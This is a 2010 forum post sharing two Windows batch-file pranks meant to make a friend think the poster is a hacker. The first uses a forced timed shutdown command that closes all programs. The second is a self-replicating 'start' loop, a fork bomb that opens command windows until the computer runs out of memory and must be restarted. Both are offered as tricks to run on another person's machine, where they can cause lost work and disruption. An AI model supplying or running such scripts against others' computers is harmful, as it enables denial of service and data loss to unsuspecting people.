Thread Rating:
- 1 Votes - 3 Average
- 1
- 2
- 3
- 4
- 5
|
02-18-2010, 01:11 AM
|
|
MasterChief
G&S Hero
     
|
Posts: 602
Thanks Given: 10 Thanks Received: 2 in 2 posts
Joined: Oct 2009
Reputation: 0
|
|
A .Batch Fun
Here are 2 simple ways to have fun with a friend and trick them into thinking you are a hacker:-
PHP Code:
Step 1:
- Open a notepad - type in the following: SHUTDOWN -S -F -T 300 -C "Any message you want between the quotes" the value after -T is any time you want in seconds (300 being 5 minutes). the message you put in the quotes after -C will appear when this is run - save as whatever.bat - click the saved file to run it and enjoy (: (this also works by typing the following: @echo shutdown.exe -s -f -t 300 -c "Any message you want between the quotes" )
This version is a timed countdown that will close all programs and shut down the computer. To stop it, simply go to Start > Run and type in Shutdown -a. Click enter and it will go away.
OR
PHP Code:
Step 2:
- Open a notepad - type in the following: start start start start whatever.bat - save it as whatever.bat Whatever you write in the code you -must- save it as that same name as well. So if you wrote whatever.bat, it has to be saved as that. - click the saved file to run it and enjoy
This version will repeatedly open groups of 4 command prompt windows until the computer runs out of RAM. To stop it, restart your computer.
|
|
|
|